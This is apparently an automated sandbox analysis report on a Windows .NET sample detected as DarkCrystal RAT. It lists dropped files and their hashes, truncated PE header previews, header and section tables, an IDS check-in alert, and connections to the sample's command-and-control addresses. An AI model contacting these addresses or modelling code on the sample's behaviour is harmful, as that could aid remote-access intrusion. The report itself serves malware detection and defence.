                                                                                                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):32256
                                                                                                                                    Entropy (8bit):5.631194486392901
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):69632
                                                                                                                                    Entropy (8bit):5.932541123129161
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):22016
                                                                                                                                    Entropy (8bit):5.41854385721431
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                                                    MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                                                    SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                                                    SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                                                    SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):9728
                                                                                                                                    Entropy (8bit):5.0168086460579095
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                                                                                                                    MD5:69546E20149FE5633BCBA413DC3DC964
                                                                                                                                    SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                                                                                                                    SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                                                                                                                    SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................*V...}................*.*.0..C.......(....o.......(....(....o.......(....s......(...........o....o.....*..0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..
                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                    File Type:JSON data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):55
                                                                                                                                    Entropy (8bit):4.306461250274409
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                    File Type:MSVC .res
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1224
                                                                                                                                    Entropy (8bit):4.435108676655666
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                                                                    MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                                                                    SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                                                                    SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                                                                    SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):4608
                                                                                                                                    Entropy (8bit):3.999793466829071
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:6CJzPt5M7Jt8Bs3FJsdcV4MKe273dNPvqBHWOulajfqXSfbNtm:ZPgPc+Vx9MfvkwcjRzNt
                                                                                                                                    MD5:74D9265C5C6AD04899B1D3B0B66CA29D
                                                                                                                                    SHA1:D5E9446379169E64DA39CCE906C4560D5FBA6570
                                                                                                                                    SHA-256:FFE468C90C0EAEBE4572748154017CD1A6DD13A70F7E032F4199FD1BFDBFD577
                                                                                                                                    SHA-512:69BC39758FF6C1A4754133A206318DB8196FF5F0BEE55E5E14384CDAD66F18D401973FC121D37F5B4EEA857D539C2429841212BC66066AC5B7D9BA3327493405
                                                                                                                                    Malicious:true
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....h"f.............................'... ...@....@.. ....................................@..................................'..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..l.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.<.......#GUID...L... ...#Blob...........WU........%3................................................................
                                                                                                                                    Process:C:\Windows\System32\PING.EXE
                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):502
                                                                                                                                    Entropy (8bit):4.621947447102293
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:PXw5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:KdUOAokItULVDv
                                                                                                                                    MD5:2A6C589C9D3AC3A780DABA9F2CDA32BC
                                                                                                                                    SHA1:C9B54D3BABAE1D8EE0DC4FBD27290660A57C4771
                                                                                                                                    SHA-256:FCB1EA56700511672DD25E54F9D7890DB56A32D1221E92761918630448CA9BDA
                                                                                                                                    SHA-512:7A6572FF7C6CCAB310DD18FB4F167B0A164A1622C1D40DA2F44F2A6BB38ABFAE856B7D919D60C26336A8FACE53ABDB23466AAB5CCCB212671F07131D0C4A13D8
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:..Pinging 065367 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Entropy (8bit):7.6230020226991435
                                                                                                                                    TrID:
                                                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                    File name:W4tW72sfAD.exe
                                                                                                                                    File size:2'079'744 bytes
                                                                                                                                    MD5:9026338fce277581062754cab87462e7
                                                                                                                                    SHA1:191b8d92c18b84fdef03f691583d8b89598cb7da
                                                                                                                                    SHA256:5565710131f195b46fb7c0b124d16df72ec5e0aafdd22590eaff7885aead636f
                                                                                                                                    SHA512:8be58979eec71fe69408aa621e756d76b58db496da456dad533fb88ad800ecf8d8e5933baedda4742c1dc4e5095f8fe7c3071f0339b056f54a378adb08908fca
                                                                                                                                    SSDEEP:24576:aSLLyDf1/7HnFZnA83kJTwJiYYfbeQYPXI3IDyVZqVhTEmkz3UzKzMlJ6wwLI:aSXM/dUJ8SDeQYvI3IGmhTZYlwlJJM
                                                                                                                                    TLSH:E2A5CE42B5124973CFD5E337D193403C42A1DA723996EF2B3A2A81C5F542271AF7A6F2
                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................................. ........@.. ....................... ...........@................................
                                                                                                                                    Icon Hash:90cececece8e8eb0
                                                                                                                                    Entrypoint:0x5fd3de
                                                                                                                                    Entrypoint Section:.text
                                                                                                                                    Digitally signed:false
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    Subsystem:windows gui
                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                    Time Stamp:0x6507AC75 [Mon Sep 18 01:48:37 2023 UTC]
                                                                                                                                    TLS Callbacks:
                                                                                                                                    CLR (.Net) Version:
                                                                                                                                    OS Version Major:4
                                                                                                                                    OS Version Minor:0
                                                                                                                                    File Version Major:4
                                                                                                                                    File Version Minor:0
                                                                                                                                    Subsystem Version Major:4
                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                    Instruction
                                                                                                                                    jmp dword ptr [00402000h]
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1fd390 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1fe000 | 0x370 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x200000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x1fb3e4 | 0x1fb400 | c51e133e404dbc5c6c1954cc13a29a13 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x1fe000 | 0x370 | 0x400 | 2d9810ece9366bcfe74ca488f145a40c | False | 0.37890625 | data | 2.867353130536527 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x200000 | 0xc | 0x200 | 4567c0c476ec2cd9f94012a2f7597a16 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x1fe058 | 0x318 | data | | | 0.44823232323232326

DLL | Import
mscoree.dll | _CorExeMain

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
04/19/24-13:42:33.224120 | TCP | 2048095 | ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) | 49739 | 80 | 192.168.2.4 | 104.21.57.61

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                    Apr 19, 2024 13:42:00.538590908 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:01.561234951 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:01.561327934 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:01.561363935 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:01.561443090 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:01.561501980 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:01.562009096 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:33.119082928 CEST4973980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:33.223753929 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:33.223844051 CEST4973980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:33.224119902 CEST4973980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:33.328352928 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:33.328784943 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:33.329711914 CEST4973980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:33.474992037 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:33.711438894 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:33.711503029 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:33.711541891 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:33.711566925 CEST4973980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:33.848263025 CEST4973980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:33.880670071 CEST4973980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:33.934123039 CEST4974080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:33.985230923 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:33.985332012 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:33.985574007 CEST4973980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:34.038408995 CEST8049740104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.038506985 CEST4974080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:34.038744926 CEST4974080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:34.131942987 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.143039942 CEST8049740104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.143064976 CEST8049740104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.143234015 CEST4974080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:34.247694969 CEST8049740104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.261830091 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.261862040 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.262082100 CEST4973980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:34.300662994 CEST4973980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:34.405031919 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.405599117 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.405795097 CEST4973980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:34.498954058 CEST8049740104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.499017954 CEST8049740104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.499094009 CEST4974080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:34.510258913 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.620609045 CEST4974080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:34.621573925 CEST4974180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:34.682418108 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.682482958 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.682615042 CEST4973980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:34.725228071 CEST8049740104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.725313902 CEST4974080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:34.725982904 CEST8049741104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.726088047 CEST4974180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:34.726541042 CEST4974180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:34.830910921 CEST8049741104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.830943108 CEST8049741104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.831384897 CEST4974180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:34.936065912 CEST8049741104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:35.172565937 CEST8049741104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:35.172627926 CEST8049741104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:35.173054934 CEST4974180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:35.528666019 CEST4973980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:35.528850079 CEST4974180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:35.529920101 CEST4974280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:35.633728981 CEST8049741104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:35.633826971 CEST4974180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:35.633994102 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:35.634089947 CEST4973980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:35.634820938 CEST8049742104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:35.635047913 CEST4974280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:35.645311117 CEST4974380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:35.752018929 CEST8049743104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:35.752253056 CEST4974380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:35.752336979 CEST4974380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:35.858159065 CEST8049743104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:35.858709097 CEST8049743104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:35.859002113 CEST4974380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:35.966344118 CEST8049743104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:36.223082066 CEST8049743104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:36.223144054 CEST8049743104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:36.223546982 CEST4974380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:36.421838045 CEST4974380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:36.450879097 CEST4974480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:36.529078960 CEST8049743104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:36.529266119 CEST4974380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:36.555656910 CEST8049744104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:36.555890083 CEST4974480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:36.556998968 CEST4974480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:36.661509037 CEST8049744104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:36.661571980 CEST8049744104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:36.661927938 CEST4974480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:36.766714096 CEST8049744104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:36.900268078 CEST4974280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.047378063 CEST8049744104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.047442913 CEST8049744104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.047636032 CEST4974480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.175561905 CEST4974480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.186424017 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.265070915 CEST4974880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.280322075 CEST8049744104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.280584097 CEST4974480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.290339947 CEST49749443192.168.2.434.117.186.192
